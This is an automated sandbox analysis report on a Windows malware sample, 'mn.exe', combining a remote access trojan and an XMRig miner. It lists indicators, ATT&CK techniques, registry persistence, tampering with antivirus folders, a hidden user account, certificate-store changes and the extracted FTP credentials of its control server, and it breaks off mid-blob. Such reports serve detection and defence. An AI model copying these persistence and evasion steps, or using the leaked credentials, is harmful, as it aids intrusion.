rms | 39e6a32ee280960f6e4e2d4e38fb25e96ae8f5bd163bafb8ffeab87e2216e639

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7v20201028
submitted
07-04-2021 07:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mn.exe
Size

11.9MB
MD5

387139f87dc3b8dd527bf15b64abd197
SHA1

65e227af49ed8a2015e9e9723507e261c9187e23
SHA256

39e6a32ee280960f6e4e2d4e38fb25e96ae8f5bd163bafb8ffeab87e2216e639
SHA512

3a9ba9a823f21f5d7620698ae6c96ff32c6646110a8fa1c652c3e1e39e59f58904244d65e5f9cd5da6e408f7515f9db62b2f13c16a8e54489fc88e0780c70ade

Score

10^/10

rms xmrig aspackv2 discovery evasion miner persistence rat trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
193.32.188.10
Port:
21
Username:
alex
Password:
easypassword

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	acprotect
C:\ProgramData\Windows\vp8decoder.dll	acprotect

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/368-192-0x000000013F910000-0x000000013FEB0000-memory.dmp	xmrig

ASPack v2.12-2.42 11 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242
\ProgramData\Windows\rfusclient.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 2 IoCs

Processes:

cmd.exemn.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	mn.exe

Executes dropped EXE 27 IoCs

Processes:

wini.exewinit.execheat.exenetsh.exetaskhost.exerutserv.exeicacls.exerutserv.exerfusclient.exerfusclient.exetaskhostw.exerfusclient.exeR8.exeRar.exetaskhost.exeRDPWInst.exewinlogon.exeRDPWInst.exescaner.exetaskhostw.exescandll.exestart.exerundll.exesystem.exesystem.exeEternalblue-2.2.0.exeMicrosoftHost.exe

pid	process
1440	wini.exe
1700	winit.exe
560	cheat.exe
1156	netsh.exe
1568	taskhost.exe
1960	rutserv.exe
304	icacls.exe
240	rutserv.exe
1712	rfusclient.exe
1040	rfusclient.exe
1136	taskhostw.exe
1708	rfusclient.exe
2148	R8.exe
2896	Rar.exe
1028	taskhost.exe
3052	RDPWInst.exe
2260	winlogon.exe
2668	RDPWInst.exe
2868	scaner.exe
2984	taskhostw.exe
2196	scandll.exe
2060	start.exe
2764	rundll.exe
1648	system.exe
2524	system.exe
2504	Eternalblue-2.2.0.exe
368	MicrosoftHost.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	upx
C:\ProgramData\Windows\vp8decoder.dll	upx

Loads dropped DLL 63 IoCs

Processes:

mn.exewini.execmd.execheat.exerutserv.exetaskhost.execmd.exetaskeng.execmd.execmd.execmd.exesystem.exesystem.execmd.exeEternalblue-2.2.0.exetaskhost.exe

pid	process
1856	mn.exe
1440	wini.exe
1440	wini.exe
1440	wini.exe
1440	wini.exe
1856	mn.exe
964	cmd.exe
560	cheat.exe
560	cheat.exe
560	cheat.exe
560	cheat.exe
240	rutserv.exe
1568	taskhost.exe
1568	taskhost.exe
2276	cmd.exe
2348	taskeng.exe
2460	cmd.exe
2248
2460	cmd.exe
2004	cmd.exe
2264	cmd.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
1648	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2524	system.exe
2424	cmd.exe
2424	cmd.exe
2504	Eternalblue-2.2.0.exe
2504	Eternalblue-2.2.0.exe
2504	Eternalblue-2.2.0.exe
2504	Eternalblue-2.2.0.exe
2504	Eternalblue-2.2.0.exe
2504	Eternalblue-2.2.0.exe
2504	Eternalblue-2.2.0.exe
2504	Eternalblue-2.2.0.exe
2504	Eternalblue-2.2.0.exe
1028	taskhost.exe

Modifies file permissions 1 TTPs 56 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
2436	icacls.exe
3004	icacls.exe
800	icacls.exe
2868	icacls.exe
304	icacls.exe
2172	icacls.exe
2668	icacls.exe
2332	icacls.exe
2684	icacls.exe
944	icacls.exe
676	icacls.exe
2972	icacls.exe
824	icacls.exe
2640	icacls.exe
2528	icacls.exe
2780	icacls.exe
2920	icacls.exe
2224	icacls.exe
1524	icacls.exe
1156	icacls.exe
2608	icacls.exe
824	icacls.exe
2592	icacls.exe
2228	icacls.exe
2200	icacls.exe
736	icacls.exe
2804	icacls.exe
2340	icacls.exe
2740	icacls.exe
2204	icacls.exe
2268	icacls.exe
2464	icacls.exe
2628	icacls.exe
2636	icacls.exe
2284	icacls.exe
1876	icacls.exe
2328	icacls.exe
2356	icacls.exe
2816	icacls.exe
2812	icacls.exe
2916	icacls.exe
2420	icacls.exe
2552	icacls.exe
2952	icacls.exe
2976	icacls.exe
2592	icacls.exe
304	icacls.exe
2516	icacls.exe
2544	icacls.exe
2528	icacls.exe
1516	icacls.exe
2880	icacls.exe
2680	icacls.exe
1408	icacls.exe
2220	icacls.exe
2864	icacls.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mn.exetaskhostw.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	mn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	mn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 ip-api.com

flow	ioc
7	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

mn.exeRDPWInst.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	mn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	mn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	mn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	mn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	mn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	mn.exe

Drops file in System32 directory 2 IoCs

Processes:

taskhost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\winmgmts:\localhost\root\CIMV2	taskhost.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\	taskhost.exe

Drops file in Program Files directory 26 IoCs

Processes:

mn.exeRDPWInst.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft JDX	mn.exe
File opened for modification	C:\Program Files\Kaspersky Lab	mn.exe
File opened for modification	C:\Program Files\Cezurity	mn.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	mn.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\Malwarebytes	mn.exe
File opened for modification	C:\Program Files\COMODO	mn.exe
File opened for modification	C:\Program Files\Enigma Software Group	mn.exe
File opened for modification	C:\Program Files (x86)\AVG	mn.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	mn.exe
File opened for modification	C:\Program Files (x86)\Panda Security	mn.exe
File opened for modification	C:\Program Files (x86)\360	mn.exe
File opened for modification	C:\Program Files\AVAST Software	mn.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	mn.exe
File opened for modification	C:\Program Files\Common Files\McAfee	mn.exe
File opened for modification	C:\Program Files\ESET	mn.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	mn.exe
File opened for modification	C:\Program Files\ByteFence	mn.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	mn.exe
File opened for modification	C:\Program Files\SpyHunter	mn.exe
File opened for modification	C:\Program Files\AVG	mn.exe
File opened for modification	C:\Program Files (x86)\Cezurity	mn.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

winit.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1516 schtasks.exe
2616 schtasks.exe
2772 schtasks.exe
2800 schtasks.exe
Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

744 timeout.exe
2464 timeout.exe
1052 timeout.exe
2624 timeout.exe
2664 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

1516 ipconfig.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1824 taskkill.exe
2608 taskkill.exe
3020 taskkill.exe

pid	process
1516	schtasks.exe
2616	schtasks.exe
2772	schtasks.exe
2800	schtasks.exe

pid	process
744	timeout.exe
2464	timeout.exe
1052	timeout.exe
2624	timeout.exe
2664	timeout.exe

pid	process
1516	ipconfig.exe

pid	process
1824	taskkill.exe
2608	taskkill.exe
3020	taskkill.exe

Modifies registry class 3 IoCs

Processes:

winit.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

RDPWInst.exemn.exeRDPWInst.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	RDPWInst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	RDPWInst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	RDPWInst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	RDPWInst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1